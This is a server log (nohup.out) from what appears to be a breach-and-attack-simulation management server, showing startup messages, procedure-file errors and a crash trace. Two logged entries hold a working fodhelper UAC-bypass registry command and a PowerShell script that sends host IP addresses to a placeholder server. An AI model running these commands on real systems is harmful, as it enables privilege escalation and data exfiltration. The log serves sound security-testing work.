-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathnohup.out
More file actions
125 lines (108 loc) · 10.1 KB
/
nohup.out
File metadata and controls
125 lines (108 loc) · 10.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
_______ __
/ ____(_) /_ ___ _____
/ /_ / / __ \/ _ \/ ___/
/ __/ / / /_/ / __/ /
/_/ /_/_.___/\___/_/ v3.0.0-beta.3
--------------------------------------------------
INFO Server started on: http://127.0.0.1:8002 (bound on host 0.0.0.0 and port 8002)
INFO Total handlers count: 19
INFO Prefork: Disabled
INFO PID: 224619
INFO Total process count: 1
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
TCP server listening on port 8080
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8001
[GIN] 2024/10/19 - 16:07:54 | 200 | 220.781µs | 223.195.37.233 | GET "/swagger/index.html"
[GIN] 2024/10/19 - 16:07:54 | 200 | 8.908871ms | 223.195.37.233 | GET "/swagger/swagger-ui.css"
[GIN] 2024/10/19 - 16:07:54 | 200 | 24.499633ms | 223.195.37.233 | GET "/swagger/swagger-ui-standalone-preset.js"
[GIN] 2024/10/19 - 16:07:54 | 200 | 61.165701ms | 223.195.37.233 | GET "/swagger/swagger-ui-bundle.js"
[GIN] 2024/10/19 - 16:07:54 | 200 | 77.784µs | 223.195.37.233 | GET "/swagger/favicon-32x32.png"
[GIN] 2024/10/19 - 16:07:54 | 200 | 214.097µs | 223.195.37.233 | GET "/swagger/doc.json"
[GIN] 2024/10/19 - 16:07:54 | 304 | 20.359µs | 223.195.37.233 | GET "/swagger/favicon-32x32.png"
======= tcp received ===========
Invalid Command
Error reading from connection: EOF
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Collection_0006.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0004.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0005.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_DefenseEvasion_0009.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0014.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0018.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0019.yaml: failed to unmarshal yaml: yaml: line 5: did not find expected key
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Discovery_0022.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0011.yaml: failed to unmarshal yaml: yaml: line 9: could not find expected ':'
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0012.yaml: failed to unmarshal yaml: yaml: line 3: found character that cannot start any token
2024/10/19 16:21:10 failed to load file HTTPsBAS-Procedures/P_Persistence_0013.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
&{ObjectID("000000000000000000000000") 4b1abe9d2ab645e4a93672722915d65d P_PrivilegeEscalation_0001 beba052411994cc3acb54a10209deb9b 2024-10-19 16:21:13.7738921 +0900 KST 1
Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open
Name Property
---- --------
command
New-Item -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Force; Set-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Name '(default)' -Value 'cmd.exe /c start "C:\Users\user\Desktop\agent.exe"'; Set-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\shell\open\command' -Name 'DelegateExecute' -Value ''; Start-Process "fodhelper.exe"}
Inserted document with ID: ObjectID("67135de9cd35e156c0a3300b")
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Collection_0006.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0004.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_CredentialAccess_0005.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_DefenseEvasion_0009.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0014.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0018.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0019.yaml: failed to unmarshal yaml: yaml: line 5: did not find expected key
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Discovery_0022.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0011.yaml: failed to unmarshal yaml: yaml: line 9: could not find expected ':'
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0012.yaml: failed to unmarshal yaml: yaml: line 3: found character that cannot start any token
2024/10/19 16:21:17 failed to load file HTTPsBAS-Procedures/P_Persistence_0013.yaml: failed to unmarshal yaml: yaml: line 8: could not find expected ':'
&{ObjectID("000000000000000000000000") 4b1abe9d2ab645e4a93672722915d65d P_Discovery_0001 6057a0c905d34f9d84518398b85ee8db 2024-10-19 16:21:37.3475748 +0900 KST -1 command execution failed: Invoke-WebRequest : Internet Explorer ������ ������ �� ���ų� Internet Explorer�� ���� ���� ������ �������� �ʾ�
���� �������� ���� �м��� �� �����ϴ�. UseBasicParsing �Ű� ������ �����ϰ� �ٽ� �õ��Ͻʽÿ�.
��ġ ��:1 ����:273
+ ... ess; $PublicIP = (Invoke-WebRequest -Uri "http://ifconfig.me").Conten ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestC
ommand
Invoke-RestMethod : ���� �̸��� Ȯ���� �� �����ϴ�.: 'server'
��ġ ��:1 ����:393
+ ... PublicIP }; Invoke-RestMethod -Uri "@server" -Method Post -Body ($Dat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-RestMethod], WebException
+ FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeRestMethodCommand
, error: exit status 1 $PrivateIP = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.IPAddress -like '10.*' -or $_.IPAddress -like '172.1[6-9].*' -or $_.IPAddress -like '172.2[0-9].*' -or $_.IPAddress -like '172.3[0-1].*' -or $_.IPAddress -like '192.168.*.*' }).IPAddress; $PublicIP = (Invoke-WebRequest -Uri "http://ifconfig.me").Content.Trim(); $Data = @{ PrivateIP = $PrivateIP; PublicIP = $PublicIP }; Invoke-RestMethod -Uri "@server" -Method Post -Body ($Data | ConvertTo-Json) -ContentType "application/json" | Out-Null}
Inserted document with ID: ObjectID("67135e01cd35e156c0a33018")
======= tcp received ===========
panic: runtime error: makeslice: len out of range
goroutine 7476 [running]:
github.com/HTTPs-omma/HTTPsBAS-HSProtocol/HSProtocol.(*HSProtocolManager).Parsing(0x220ee90?, {0xc001780000, 0x435a8d?, 0xc000f2d340?})
/home/ubuntu/go/pkg/mod/github.com/!h!t!t!ps-omma/!h!t!t!ps!b!a!s-!h!s!protocol@v1.4.2/HSProtocol/HSProtocol.go:129 +0x85
main.handleTCPConnection({0x124fef8, 0xc000baee90})
/home/ubuntu/agentApp/HTTPsBAS-ManagingServer/main.go:110 +0x20f
created by main.TCPServer in goroutine 5
/home/ubuntu/agentApp/HTTPsBAS-ManagingServer/main.go:88 +0x25f
exit status 2
TCP server listening on port 8080
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
_______ __
/ ____(_) /_ ___ _____
/ /_ / / __ \/ _ \/ ___/
/ __/ / / /_/ / __/ /
/_/ /_/_.___/\___/_/ v3.0.0-beta.3
--------------------------------------------------
INFO Server started on: http://127.0.0.1:8002 (bound on host 0.0.0.0 and port 8002)
INFO Total handlers count: 19
INFO Prefork: Disabled
INFO PID: 3157198
INFO Total process count: 1
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8001
signal: interrupt
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
Error starting HTTP server: failed to listen: failed to listen: listen tcp4 :8002: bind: address already in use